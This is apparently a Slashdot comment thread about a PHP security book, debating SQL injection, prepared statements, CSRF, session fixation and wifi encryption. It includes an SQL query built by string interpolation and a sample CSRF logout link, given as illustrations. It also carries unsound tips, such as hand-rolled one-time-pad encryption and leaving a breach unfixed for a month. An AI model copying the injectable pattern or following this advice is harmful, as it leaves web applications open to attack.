One of the biggest risks, and we are ALL GUILTY, is the use of things like printf to construct a query line. Technically, you should prepare a statement and then execute the statement using the parameters as terms. Not only is this faster, it eliminates the possibility that the terms will be parsed by the query parser as they are passed to a pre-parsed query.

Even "good" sites have to be monitored for abuse because jerks post viagra and porn links in almost every blog. Captcha is good for that, but it doesn't work 100% of the time and its getting worse.

Re:No language is secure

[dblackshell]

till know I didn't see a bot which could solve a reCAPTCHA ?!

Re:No language is secure

[Qzukk]

is the use of things like printf to construct a query line.

That's just dumb. If you're going to go through the trouble of getting everything in just the right order for printf to fill in those %s placeholders, what the heck are you doing using printf?

I can understand
$sql="SELECT * FROM foo WHERE day<='$maxdate'";
because then at least you have the excuse of adding on a
if ($mindate) { $sql.=" AND day>='$mindate'"; }
which back in the bad old days of using "?" as placeholders in a prepared query would have been impossible without turning your execute call into a candidate for the dailywtf of the year.

Re:No language is secure

That's just dumb.

Depends on how you're using it.

$db = new PDO(YOUR_DSN_CONST);
$q = sprintf('SELECT * FROM foo WHERE day <= %s%s',
    $db->quote($maxdate),
    ($mindate)? 'AND day >= ' . $db->quote($mindate): '');

Quite often I'm using printf to create query fragments (eg: OFFSET and LIMIT for pagination). The code will be stashed in a utility class, the format string will be a const from another static class (DB portability). I refuse to use prepared statements for one shot queries and in any case, 99% of the time I'm SELECTing against a read only view.

I also find sprintf with the ternary easier to read than if-else style baby steps and with an opcode cache the branching cost will be the same.

Re:No language is secure

Your subject is correct, however, I'd expect the average C++ socket programmer to be much better versed in security than the average PHP programmer.

And being a compiled language doesn't mean security either - some of the least secure programs Ive seen were written by Java programmers.

The barrier to entry for PHP, Python, VB, and any language with a wizard are so low that real security isn't something the average programmer knows about.

You know, a good firewall will protect anything anyway, not.

Re:No language is secure

[Lobster+Quadrille]

...And I haven't seen a human that could read that sentence.

No he doesn't

[dblackshell]

For CSRF to work the attacker has to be able to inject his own content into your site that a victim can then come by and download.

I don't know what you are talking about, but it seems partially XSS combined with some malware...

CSRF is something else...

http://slashdot.org/my/logout - this is a CSRF link

Re:No he doesn't

[encoderer]

That's a good illustration: You just injected content that I downloaded. In your case, it was the link.

Sure, there are a lot of apps that have some sort of facility for this. But there are just as many that don't.

Re:No he doesn't

[TheThiefMaster]

CSRF is when there is a link or even better an image on another site that causes some action on the first site. Image (img tags) work better because they are normally downloaded automatically by the browser, and there is no restriction on them that means the URL they load has to be an image...

It's normally pretty limited as to what they can do though.

Re:No he doesn't

[Lobster+Quadrille]

Normally, yes. But Here's a guy who used CSRF to root a server.

Exception, maybe, but I think it's about time people start taking those little client-side exploits seriously.

Re:No he doesn't

[TheThiefMaster]

Put simply, XSS and CSRF can perform actions on behalf of whoever is using the browser without their consent.
In that case the user happened to be using the admin side of cpanel, and the action was to change the root password.
The protection against CSRF is to require re-entry of logon details for all sensitive actions, or to use a unique "key" in the link.

For most web security issues, the fix is trivial, you just have to know about it.

Another "hacking" trick is "session fixation", and it works like this: provide a victim with a link to a site that's using php, passing a php session id in the url. Victim logs in to site, you can now use their (logged-in) session, because you have the session id (you gave it to them!).
The fix is to regenerate the session id on login, or to restrict a session to the IP of the user who started it, or to disable using session ids from the url. Or all of the above.
It also helps to store the last session id used by each user into your users table to stop a user being logged in to multiple sessions at once.

Inherently Insecure...

Do they actually argue this? I didn't read the book and I only glossed over the review but I didn't really see anything that suggested these problems were inherent to using PHP.

The only "inherent" problem with PHP is that it's incredibly easy to pick up as a starter language. There is nothing really intimidating about PHP, and gettign your "hello world" running is quick, easy, and free (generally). This allows every newb and their little newphew to create websites for their family and employers...(Not that I haven't seen epic POS' out of pro java-shops)

Community more unsecure than the language

[daeg]

The community and fleet of developers available to PHP is far and away the more vulnerable than register_globals could ever be.

Modern code bases, books, and examples are STILL being written using string concatenation to build SQL! These examples are teaching these dated, insecure methods to novices, thus guaranteeing these horrible practices will propagate for a long, long time.

Re:Community more unsecure than the language

[Lobster+Quadrille]

1. Write bad advice
2. People follow advice
3. ...
4. Profit!

Bruce Schneier != David A. Wheeler

[dwheeler]

Thanks for the plug for Secure Programming for Linux and Unix HOWTO. But I wrote it, not Bruce Schneier. Schneier has written other books, such as "Applied Cryptography" and "Schneier on Security".

Schneier is the supergenius

who advises people to not encrypt their wireless access points. So yes, let's quote him on all security matters.

Re:Schneier is the supergenius

[micheas]

Why not run wireless unencrypted. and run anything you actually care about being encrypted either over ssl, through an ssh tunnel, or some other form of real encryption?

WEP is a little more secure than telnet, but not much, and telnet with OPIE may be more secure than WEP on a high traffic wireless access point.

WPA2 is unproven while IPSEC, tls, ssl, and ssh all use proven encryption.

If you care about security you would use proven security, and find that the unproven security in WPA2 is just overhead as you cannot trust it to not be compromised.

Wireless security is just for keeping people from borrowing your internet connection, not real security, although that is there eventual goal.

And if you are like most people you don't access your home server but a server on the internet as the ultimate destination of your wireless connection in which case open wifi may be the least hostile network that you are connecting through.

There is the argument that fake security is worse than no security and bruce schneier seems to be of that mind set.

Re:Schneier is the supergenius

[Lobster+Quadrille]

"WPA2 is unproven while IPSEC, tls, ssl, and ssh all use proven encryption."

Picking nits, I know, but I'm pretty sure Scheier would tell you that the only way you can prove an encryption is to prove it's weak.

Re:Schneier is the supergenius

[Sancho]

Why not run wireless unencrypted. and run anything you actually care about being encrypted either over ssl, through an ssh tunnel, or some other form of real encryption?

Why not use both?

Use WPA2 to mitigate the risk of someone accessing your AP in an unauthorized manner--let's be realistic here, it's a "good enough" protocol for now, and there will be lots of time to adjust if it's ever broken (it will be the biggest story of the year on Slashdot--we'll all hear about it before we're in any real danger.) But you can use the secure protocols just to be safe--hell, I already do, because I don't trust what's outside of my wireless network.

The reasons to use WPA2 despite the fact that I'm already security my important traffic? Schneier outlines that perfectly:

While none thought you could be successfully prosecuted just because someone else used your network to commit a crime, any investigation could be time-consuming and expensive. You might have your computer equipment seized, and if you have any contraband of your own on your machine, it could be a delicate situation. Also, prosecutors aren't always the most technically savvy bunch, and you might end up being charged despite your innocence. The lawyers I spoke with say most defense attorneys will advise you to reach a plea agreement rather than risk going to trial on child-pornography charges.

Although he denounces that based upon statistics, it's such a simple thing to use WPA2 (in most cases) that it's almost like a free shot at some extra security. On the off chance that someone does use your connection for illicit means and you get caught, I don't think the Judge is going to care about the statistics. Better to take then 10 minutes to set up WPA2 and be done with it.

Looking back, though, it doesn't look like Schneier is concerned with the "fake security" of this at all. Mostly, it's an odds game, and the fact that he doesn't mind sharing. That's noble--it really is--but in this climate where being accused of a crime is often tantamount to having committed it (in the eyes of the law) it's not a chance I'm willing to take.

Re:Schneier is the supergenius

WPA2 is unproven while IPSEC, tls, ssl, and ssh all use proven encryption.

WPA2 uses AES, which is sufficiently "proven" for the US government to trust it with TOP SECRET data. If there are implementation flaws, then nobody's found them yet. Conversely, ssh in particular has a track record of poor implementations leading to serious security flaws, while SSL is very variable indeed, and includes a number of very insecure algorithms.

Re:Schneier is the supergenius

[micheas]

Well there has been some progress on what you can do for moderate expense.

http://pyrit.wordpress.com/the-twilight-of-wi-fi-protected-access/

Re:God Hates Fags!

[thetoadwarrior]

Purely replying to a troll does not automatically mean you've been trolled.

That Would Be Too Distracting

[Greyfox]

Clippy is undressing me with his eyes. The sexual harassment lawsuit is ongoing. I don't think I could take security advice from someone like that.

Re:That Would Be Too Distracting

clippy rule 34?

Re:That Would Be Too Distracting

http://www.encyclopediadramatica.com/Image:Rule34PC.png

Re:God Hates Fags!

I'm amazed you don't know that.

Re:God Hates Fags!

[Goaway]

No, but taking blatantly obvious bait like "Linux Torvalds" sure does.

Database Side

[Tablizer]

One technique for security is to limit the visible data to only what the web-app's DB login can access. For example, limit the app's login user-name to pre-defined read-only views, and stored procedures for the write stuff. Thus, if the hacker is able to inject her way into the SQL interpreter, she can only read and change what has been pre-allowed at the maximum, which is often only what the app allowed anyhow. It's a bit tedious, but that's the cost of security.

Re:God Hates Fags!

[Savage-Rabbit]

Who is this Linux Torvalds you keep talking about? Is that a new distro I don't know?

Linus Torwalds' firstborn son?

Not everything is cloak and dager. PHP rocks

must preserve my resources . . .
          resist the urge to flame back . . .

    Really everything isn't
cloak and dager on the internet

PHP is a pretty damn good free language.

Ya, idiots. They are everywhere. Posting
    their lame rants.

You answered your own question

Hi there! It looks like you are passing user input to an SQL statement. Would you like to:

A) Sanitize your input before going any further.

B) Sanitize, schmanitize, just code that sucker together. We'll iron out the kinks later.

C) Huh? Why would that be a problem?

If you just clicked option A, what would be the problem? I'm not following your logic.

Re:God Hates Fags!

[Atriqus]

Wow, that was one hell of a typo. It's spelled "First Post."

Such a load of crap

[Secret+Rabbit]

I'm *really* getting sick of people saying that programming language X is inherently insecure. It's total bullshit. EVERY language has its pros and cons and unless the INTERPRETER has an issue, then it's NOT the languages fault. And since EVERY INTERPRETER has had flaws in it, that can_not_ be the criteria for whether a *language* is secure or not.

In other words, STOP BLAMING THE LANGUAGE FOR THE FOLLY OF THE PROGRAMMER. Just because PHP has been used by some idiots does _not_ make it an "inherently insecure" language. Those idiots would make an insecure site regardless of language.

backups and Vernam algorythm

[Max_W]

I would add as a security measure to be able to reinstall a web application from a recent backup immediately. Any place, any time, on a very short notice. Just have the recent backup ready to upload. Or even several of them, if one for some reason is corrupted.

I experienced an SQL attack which destroyed one of MySQL tables. I reinstalled it from backup and corrected the breach a month later. I mean a hacker most probably will not be watching your website day and night and attack it as soon as it is back online. Have it up online from a backup and correct the security issue later.

I would also question the mantra "security by obscurity". Sort of, never use home-made encryption, as it is "security by obscurity", use instead 3 or 4 existing implementations of encryption. Then I read about Vernam's algorithm http://en.wikipedia.org/wiki/One_time_pad . I tried to implement it in PHP and JavaScript. It is like 25 lines of code. And it is mathematically absolutely secure. What I think is that an existing encryption solution, which contains thousands lines of a convoluted code, may as well contain a hidden backdoor. While if one understands the mathematical model of an encryption algorithm and implement it himself, it makes it probably more reliable. I trust mathematics more then a vendor, even if seemingly reputable.

I mean they listen to phone conversations (it's the fact), would not it be a thing to expect that they read encrypted strings? I have nothing against it, until these eavesdropping capabilities diffuse to petty tugs next door.

Re:backups and Vernam algorythm

[Lobster+Quadrille]

Here's another security tip- Don't ever listen to a person who obviously doesn't know what he's talking about.

The amount of bad advice on this thread is astounding.

Re:backups and Vernam algorythm

[Max_W]

Really? What is cheaper and more effective? To cover a soldier with a body armor 100%, covering every slightest hole, or just make him immortal? It is impossible to make 100% secure web application, but to make it re-installable on a short notice from back-up is quite possible.

What wrong in advice to use the Vernam encryption algorithm? It is 100% secure. It's proven in sort of a mathematical theorem. In some cases it is just what's needed. And it's not that difficult to implement it in PHP-JavaScript.

Re:Such a load of crap

[TheSunborn]

The problem with php is that they made the insecure feature first, and told people to use it. Then they found out it was insecure and fixed it by making an other safer way to do the same thing.

Examples include the entire way mysql is accessed. First they made mysql_query which is very very difficult to make secure, because it require the developer to manually escape all
input that need to be escaped. (Not to talk about the fuckup with both having a mysql_escape_string() and then finding out it's not good enough, so they made a mysql_real_escape_string()).

Yes now they have pdo and preparedStatement but it took so long for them to make, that the insecure mysql_* functions are still the default and most mentioned.

And just look at all the magic options(Magic_quotes). Magic_quotes were added as a feature to make database access safe, because the php developers realized that the mysql_* functions were very difficult to use safely.
But they totally fucked up the design of the magic_* feature, so a program with magic_quotes sat to on, is now one of the most difficult things to make both safe and usefull.

So if you know exactly which part of php to avoid, then the rest of the language is not really insecure, but the part to avoid is mostly all the things that are mentioned(And thus used) most because it was the first thing they made.

Php need a feature to be compiled with ./configure --remove-all-the-features-we-the-developers-would-wish-we-had-newer-made

That way, you could install that version and atleast get a fatal error, each time someone used a function which should not be used. It would result in much better software, but that version of php would most likely not be able to run much predeveloped software.

Chris Shifflet

Has had a book out for years that covers all this. The fact they wrote "PHP is inherently insecure" just goes to show how much knowledge the author lacks. XSS is not exclusive to any 1 language for instance. Various PHP frameworks protect you against SQL injection. Programming is a tool and every tool has potential for abuse ( fire, hammers ). Rant over.

Bullshit.

[jotaeleemeese]

Not everybody can afford specialists (yeah, sure, how did they become one...) so a comprehensive good practice guide will always be welcome.

You are incorrect.

[jotaeleemeese]

Languages that allow you to do stupid stuff are less secure than the ones that don't.

It is that simple really.

Some languages were designed with expediency above any other concern (security included), so it is a fair assessment to make that there are some languages more secure than others.

Re:God Hates Fags!

[Leafheart]

Unless you saw that you could make a funny post about a troll post, then it is funny. :)

Here's an idea for a book

[rgviza]

Only this one works in all languages:
1. Filter your input with a character white list
2. Limit your input size
3. convert input to the smallest character set possible
and finally
4. Use prepared statements (or stored procedures in conjunction with prepared statements) for all sql queries

Beyond that it's all host and database security.

Application security is Really Simple(tm):
Assume all input is malicious. Code accordingly.

The more powerful a language (whether scripting or not) is, and the more it opens up the underlying system, the more inherently dangerous it is. PHP is more exploitable than a lot of stuff because it opens up a pretty big chunk of C and available system libraries. This characteristic also makes it a powerful scripting language.

C is arguably the most insecure language of all, out done only by assembler. Guess what PHP (and just about the entire system) is written in? C. So it's just as accurate to say that operating systems, kernels and drivers are insecure ;)

I'm not saying they aren't, I'm just saying. The authors of this book are kind of framing PHP in the wrong light... EVERY single chapter in this book could be re-written for any language because they all have the same hazards.

-Viz

Re:God Hates Fags!

[karlconnors]

Why the need to obsess on errors that make no difference?